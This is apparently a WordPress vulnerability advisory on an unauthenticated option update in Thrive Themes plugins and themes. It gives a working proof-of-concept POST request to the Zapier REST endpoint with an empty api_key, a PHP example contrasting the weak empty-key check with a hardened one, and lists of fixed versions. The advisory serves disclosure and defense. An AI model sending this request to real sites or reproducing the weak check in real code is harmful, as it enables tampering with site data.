WordPress Plugin Vulnerabilities

All Thrive Themes and Plugins - Unauthenticated Option Update

Description

The plugins and themes register a REST API endpoint associated with Zapier functionality. Although this endpoint was intended to require an API key for access, in vulnerable versions it could be reached by supplying an empty api_key parameter when Zapier was not enabled. Attackers could use this endpoint to add arbitrary data to a predefined option in the wp_options table.

Proof of Concept

POST /wp-json/td/v1/optin/subscription HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54

hook_url={"http:\/\/key":"maliciousfile.php"}&api_key=
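The description and the request above point at a common class of defect: an API-key check that "matches" when both the supplied key and the stored key are empty, which is what an unconfigured integration leaves behind. The following is an added illustrative example written for this page, not the vendor's actual code, showing that weak permission_callback shape beside a hardened one. The route namespace example/v1, the option names example_zapier_enabled, example_zapier_api_key and example_zapier_hook_url, and the function names are assumptions; only the WordPress and PHP APIs used (register_rest_route, get_option, update_option, WP_Error, hash_equals, esc_url_raw, wp_parse_url, filter_var) are real.

```php
<?php
// Added illustrative example (not the vendor's code). Option and route names
// are assumed; the point is the shape of the permission check.

// WEAK: when the integration has never been configured the stored key is '',
// so an empty api_key parameter compares equal and the request is let through.
function example_weak_permission_callback( WP_REST_Request $request ) {
    $stored_key   = (string) get_option( 'example_zapier_api_key', '' ); // '' if not enabled
    $supplied_key = (string) $request->get_param( 'api_key' );
    return $supplied_key === $stored_key; // '' === '' is true: unauthenticated access
}

// HARDENED: refuse while the integration is disabled, require a non-empty
// secret on both sides, and compare in constant time.
function example_hardened_permission_callback( WP_REST_Request $request ) {
    if ( ! get_option( 'example_zapier_enabled', false ) ) {
        return new WP_Error( 'rest_forbidden', 'Integration disabled.', array( 'status' => 403 ) );
    }
    $stored_key   = (string) get_option( 'example_zapier_api_key', '' );
    $supplied_key = (string) $request->get_param( 'api_key' );
    if ( '' === $stored_key || '' === $supplied_key ) {
        return new WP_Error( 'rest_forbidden', 'Missing API key.', array( 'status' => 401 ) );
    }
    if ( ! hash_equals( $stored_key, $supplied_key ) ) {
        return new WP_Error( 'rest_forbidden', 'Invalid API key.', array( 'status' => 403 ) );
    }
    return true;
}

// Only accept hook_url as a plain http(s) URL string, so a structured value
// like the JSON object in the proof of concept is rejected before it reaches
// the option store.
function example_validate_hook_url( $value ) {
    if ( ! is_string( $value ) || false === filter_var( $value, FILTER_VALIDATE_URL ) ) {
        return false;
    }
    $scheme = wp_parse_url( $value, PHP_URL_SCHEME );
    return in_array( $scheme, array( 'http', 'https' ), true );
}

function example_subscription_handler( WP_REST_Request $request ) {
    // Store only the validated, sanitized URL string, never arbitrary request data.
    update_option( 'example_zapier_hook_url', $request->get_param( 'hook_url' ) );
    return rest_ensure_response( array( 'success' => true ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/optin/subscription', array(
        'methods'             => 'POST',
        'callback'            => 'example_subscription_handler',
        'permission_callback' => 'example_hardened_permission_callback',
        'args'                => array(
            'hook_url' => array(
                'required'          => true,
                'validate_callback' => 'example_validate_hook_url',
                'sanitize_callback' => 'esc_url_raw',
            ),
        ),
    ) );
} );
```

Two design choices carry the fix: the check fails closed whenever the integration is disabled or either key is empty, rather than relying on string equality to do that implicitly, and the value written to wp_options is validated as a URL before it is stored, so the endpoint cannot be used to persist arbitrary data even if the permission check were bypassed again.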

Affects Plugins

Fixed in 1.4.13.3
Fixed in 1.4.15.3
Fixed in 2.3.9.4
Fixed in 2.3.9.4
Fixed in 2.3.9.4
Fixed in 2.3.9.4
Fixed in 2.6.7.4
Fixed in 2.3.9.3
Fixed in 2.4.5
Fixed in 1.57.1

Affects Themes

Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.0.0
Fixed in 2.2.4

Classification

Type
ACCESS CONTROLS

Miscellaneous

Original Researcher
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter
Chloe Chamberland, Ram Gall, Charles Sweethill
Verified
Yes

Timeline

Publicly Published
2021-03-24
Added
2021-03-24
Last Updated
2021-03-30